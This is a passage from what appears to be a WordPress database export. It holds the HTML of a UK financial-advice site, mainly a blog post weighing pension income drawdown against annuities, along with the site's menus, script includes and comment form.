<![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	What Are The Best Annuity Rates in The UK','Looking for the best annuity rates in the UK in 2013, have a health condition and would like to secure a higher income, then our advice will be of interest','publish','closed','closed','','what-are-the-best-annuity-rates-in-the-uk','','','2017-09-21 16:34:27','2017-09-21 16:34:27','',0,'http://www.equalitywalk.org.uk/what-are-the-best-annuity-rates-in-the-uk',0,'page','',0),(55,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-7464 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current_page_ancestor menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Pension Drawdown or Annuity?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li>Which is Better Pension Drawdown or Annuity?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"\" style=\"float:right;\">&#13;\n										<div id=\"post-7464\" class=\"post-7464 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions tag-drawdown-or-annuity post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Which is Better Pension Drawdown or Annuity?</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1><b>Which is Better Pension Drawdown or Annuity?</b></h1>&#13;\n<p>By : Reading Time 6 Minutes</p>&#13;\n<h2/>&#13;\n<h2><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/></h2>&#13;\n<h2><b>Which is the Best Option For Your Retirement?</b></h2>&#13;\n<p>With figures showing a spike in the number of people retiring over the next five years, more and more people are going to be faced with a difficult decision at retirement – how to make the most of the pension fund they’ve accumulated during their working life.</p>&#13;\n<p/>&#13;\n<p>For the ever decreasing number of people in final salary schemes the decision is already made, with the income you receive dependent on the number of years you’ve worked and your final salary.</p>&#13;\n<p>Most people, though, are now in less attractive money-purchase schemes – where the amount of your pension depends on how much you (and hopefully your employer) have invested throughout your working life, and how well your investments have performed.</p>&#13;\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">Deciding what to do with your pension “pot” at retirement is one of the most important financial decisions you’ll ever make.</span>&#13;\n</h3><p>For most people it comes down to a choice between taking an annuity – an income for the rest of your life – or income drawdown: keeping your money invested and drawing it as needed.</p>&#13;\n<p>Independent Financial Advice is absolutely vital when you make this decision, but here’s a snapshot guide to the two different options – and the pros and cons of each.</p>&#13;\n<h2><b style=\"line-height: 1.5em;\">Taking an Annuity</b></h2>&#13;\n<p/>&#13;\n<h6>Note – with an enhanced annuity a medical may be required</h6>&#13;\n<p>Figures from the Association of British Insurers reveal that 353,000 annuities worth £11.9 billion were sold last year to people converting their pension pot into an income, a significant 16% drop on the 420,000 sold the year before.</p>&#13;\n<p>Despite these figures  – most people end up buying an annuity at retirement. Why? Because most people have relatively small pension pots (the average pension fund size is around £20,000).</p>&#13;\n<p><span style=\"line-height: 1.5em;\">That’s the first important point – if your pension is relatively small (anything up to £100,000) then you’re probably better off with an annuity</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Most advisers will argue that below £100,000 you don’t have the money to justify the cost – and potential risks of income drawdown. So what are the advantages of an annuity?</span></p>&#13;\n<p><b style=\"line-height: 1.5em;\">It’s predictable</b><span style=\"line-height: 1.5em;\">. </span><span style=\"line-height: 1.5em;\">On the day you buy your annuity you know what your income will be for the rest of your life. There are a wide variety of options (and your financial adviser will guide you through them) but once you’ve made the decision, that’s it. You know what your income is going to be and you can plan accordingly.</span></p>&#13;\n<p><b style=\"line-height: 1.5em;\">The money will never run out</b><span style=\"line-height: 1.5em;\">. Under an annuity your income is guaranteed to be paid as long as you live. Even if you ‘beat the odds’ and live to 100, your income will still be paid.</span></p>&#13;\n<p><b>You can provide for your spouse</b>. Among the options available when you choose your annuity there’ll be the chance to provide an income for your spouse or partner if you die first. This could reduce the amount of money you’ll initially receive, but the option is there – again, your financial adviser will explain all the options.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">But an annuity also comes with disadvantages…</span></p>&#13;\n<p><b style=\"line-height: 1.5em;\">Annuity rates are low</b><span style=\"line-height: 1.5em;\">. With bank base rate at 0.5% and the Bank of England seemingly committed to keeping interest rates low, annuity rates have gradually come down. Factor in the increase in life expectancy over the past twenty years and many people are surprised and disappointed by how little income they receive when they buy an annuity.</span></p>&#13;\n<p><b>The income isn’t flexible</b>. As we noted above, once you buy an annuity, that’s it, the income is fixed. If your financial circumstances change, an annuity can’t change with them.</p>&#13;\n<p><b style=\"line-height: 1.5em;\">Too many people stick with their existing pension provider</b><span style=\"line-height: 1.5em;\">. Just because you’ve built up your pension with Company XYZ doesn’t mean you have to buy your annuity from them. Virtually all pensions now come with the ‘Open Market Option’ meaning you can buy an annuity from a different company in order to get a better income. </span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Again, your financial adviser will explain this: it will almost certainly be to your advantage to explore this option.</span></p>&#13;\n<p><b style=\"font-size: 1.5em; line-height: 1.5em;\">Income Drawdown</b></p>&#13;\n<p>Clearly an annuity won’t be right for everyone – so is income drawdown the answer? This involves leaving your pension fund invested and drawing a regular income from it by cashing in some of your investments – which brings with it advantages and, of course, disadvantages…</p>&#13;\n<p/>&#13;\n<p> </p>&#13;\n<p><b>Pension Income drawdown is flexible</b>. It offers you the chance to vary your income as you need it, meaning that you can manage your cash flow better.</p>&#13;\n<p><b style=\"line-height: 1.5em;\">You can benefit from stock market growth</b><span style=\"line-height: 1.5em;\">. With most of your money remaining invested, this means you will benefit if the funds in which you are invested do well.</span></p>&#13;\n<p>Pension drawdown can be helpful for estate planning (passing on an inheritance). For instance, by phasing drawdown, you can potentially reduce your exposure to inheritance tax in the event of your death before reaching 75 years of age.</p>&#13;\n<p>Pension drawdown allows you to make changes as your circumstances change.</p>&#13;\n<p><a href=\"#\"/> But income drawdown is riskier than an annuity.</p>&#13;\n<p>The reverse has to be true: the funds in which you are invested can do well, but they can also perform poorly. That could mean that you can’t receive the income you need from your drawdown arrangement.</p>&#13;\n<p><b style=\"line-height: 1.5em;\">Income drawdown is more expensive</b><span style=\"line-height: 1.5em;\">. Fees and charges on an investment drawdown arrangement can be quite high, which is why many advisers suggest you need at least £100,000 to make it worthwhile.</span></p>&#13;\n<p><b style=\"line-height: 1.5em;\">The money can run out</b><span style=\"line-height: 1.5em;\">.  This is the nightmare scenario for many pensioners. Theoretically you could end up ‘living too long,’ especially if you have suffered from poor investment performance. As we saw above, with a conventional annuity this can never happen.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">So both annuities and pension drawdown have significant advantages and disadvantages. However one thing is for certain – if you have a money purchase pension you will at some point need to choose between them. </span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">___</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Arranging your Pension options tax efficiently can make a significant difference to your returns over the long term, and we’re obviously happy to talk to you about how you can do this.</span></p>&#13;\n<p>As always – we are only a phone call or an e-mail away.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warmest regards</span></p>&#13;\n<p>Sam</p>&#13;\n<p>Equity SMART</p>&#13;\n<p><b>The value of an investment and the income from it could go down as well as up. The return at the end of the investment period is not guaranteed and you may get back less than you originally invested. The Financial Conduct Authority does not regulate tax advice.</b></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>We manage your wealth in less time with less hassle</h2><p>You could improve your situation, starting today - Click the link</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: <a href=\"../tag/drawdown-or-annuity/\" rel=\"tag\">Drawdown or Annuity</a></span><span class=\"sep\">|</span><a href=\"../better-pension-drawdown-annuity/\" title=\"Comment on Which is Better Pension Drawdown or Annuity?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/&amp;p[title]=Which%20is%20Better%20Pension%20Drawdown%20or%20Annuity?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Which+is+Better+Pension+Drawdown+or+Annuity%3F%20http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/&amp;title=Which%20is%20Better%20Pension%20Drawdown%20or%20Annuity?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/&amp;title=Which%20is%20Better%20Pension%20Drawdown%20or%20Annuity?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fbetter-pension-drawdown-annuity%2F&amp;name=Which+is+Better+Pension+Drawdown+or+Annuity%3F&amp;description=Which+is+Better+Pension+Drawdown+or+Annuity%3F+By+Paul+Reynolds%3A+Reading+Time+6+Minutes+Which+is+the+Best+Option+For+Your+Retirement%3F+With+figures+showing+a+spike+in+the+number+of+people+retiring+over+the+next+five+years%2C+more+and+more+people+are+going+to+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Which is Better Pension Drawdown or Annuity?&amp;body=http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../better-pension-drawdown-annuity/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7464\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"cbc40ae636\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"169\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:left;\">&#13;\n	<div id=\"text-19\" class=\"widget widget_text\">			<div class=\"textwidget\">&#13;\n<p>Fast Facts</p>&#13;\n<p><a href=\"#\"/><br/><span style=\"color: #000000;\"><b>#1</b> Annuity take up falls 16%:</span></p>&#13;\n<p><span style=\"color: #000000;\"> Despite these figures – most people end up buying an annuity.</span></p>&#13;\n<p><span style=\"color: #000000;\"><b>#2</b> Annuity rates are low:</span></p>&#13;\n<p>More people getting disappointed by how little income they receive when they buy an annuity.</p>&#13;\n<p><span style=\"color: #000000;\"><b style=\"line-height: 1.5em;\">#3 </b><strong style=\"line-height: 1.5em;\">Open Market Option:</strong></span></p>&#13;\n<p>Not enough people shopping around for a better deal.</p>&#13;\n<p><span style=\"color: 